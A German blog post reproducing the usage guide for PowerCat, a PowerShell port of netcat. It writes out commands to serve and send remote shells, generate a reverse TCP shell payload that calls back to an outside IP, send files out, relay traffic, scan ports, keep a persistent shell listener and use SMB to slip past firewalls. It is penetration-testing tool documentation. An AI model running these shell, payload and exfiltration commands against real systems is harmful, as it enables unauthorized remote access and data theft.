POWERCAT – Eine Powershell Version von Netcat

  • November 15th, 2015
  • admin

Powercat stellt die volle Funktionalität des altbewährten Linux Tools Netcat für Windows-Systeme bereit. Das wird durch die native Integration von Powershell 2 Komponenten erreicht.

Nachfolgend finden sie ein HowTo

Source: http://www.hackinsight.org/news,497.html

Installation

PowerCat is packaged as a PowerShell module. You must import the module to use its functions.

    # Import the functions via the psd1 file:
    Import-Module PowerCat.psd1

Functions & Parameters:

    Start-PowerCat # Starts a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb.
    -Port           # The port to listen on.
    -PipeName       # Name of pipe to listen on.

    -Relay          # Format: ":"
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -KeepAlive      # Restart after disconnecting.
    -Timeout        # Timeout option. Default: 60 seconds

    Connect-PowerCat # Connects a client to a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb
    -RemoteIp       # IPv4 address of host to connect to.
    -Port           # The port to connect to.
    -PipeName       # Name of pipe to connect to.

    -Relay          # Format: "::"
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -Timeout        # Timeout option. Default: 60 seconds

Basic Connections

By default, PowerCat uses TCP and reads from / writes to the console.

    # Basic Listener:
    Start-PowerCat -Port 443

    # Basic Client:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

File Transfer

PowerCat can be used to transfer files using the -SendFile and -ReceiveFile parameters.

    # Send File:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:pathtoinputfile

    # Receive File:
    Start-PowerCat -Port 443 -ReceiveFile C:pathtooutputfile

Shells

PowerCat can be used to send and serve (Power)shells using the -Execute parameter.

    # Serve a shell:
    Start-PowerCat -Port 443 -Execute

    # Send a cmd Shell:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute

UDP and SMB

PowerCat supports more than sending data over TCP.

    # Send Data Over UDP:
    Start-PowerCat -Mode Udp -Port 8000

    # Send Data Over SMB (easily sneak past firewalls):
    Start-PowerCat -Mode Smb -PipeName PowerCat

Relays

Relays in PowerCat are similar to netcat relays, but you don’t have to create a file or start a second process. You can also relay data between connections of different protocols.

    # UDP Listener to TCP Client Relay:
    Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

    # TCP Listener to UDP Client Relay:
    Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

    # TCP Client to Client Relay
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

    # TCP Listener to SMB Listener Relay
    New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat

Generate Payloads

Payloads can be generated using the New-PowerCatPayload function.

    # Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
    New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

    # Generate a tcp payload that listens on port 8000:
    New-PowerCatPayload -Listener -Port 8000 -Execute

Misc Usage

PowerCat can also perform port-scans, start persistent listeners, or act as a simple web server.

    # Basic TCP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

    # Basic UDP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

    # Persistent listener:
    Start-PowerCat -Port 443 -Execute -KeepAlive

    # Simple Web Server:
    Start-PowerCat -Port 80 -SendFile index.html

Exiting

In most cases, the ESC key can be used to gracefully exit PowerCat.

You may watch the full presentation prepared by Mike Douglas at DerbyCon 4 covering PowerCat usage:

About The Author

Leave a Comment

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

WP to LinkedIn Auto Publish Powered By : XYZScripts.com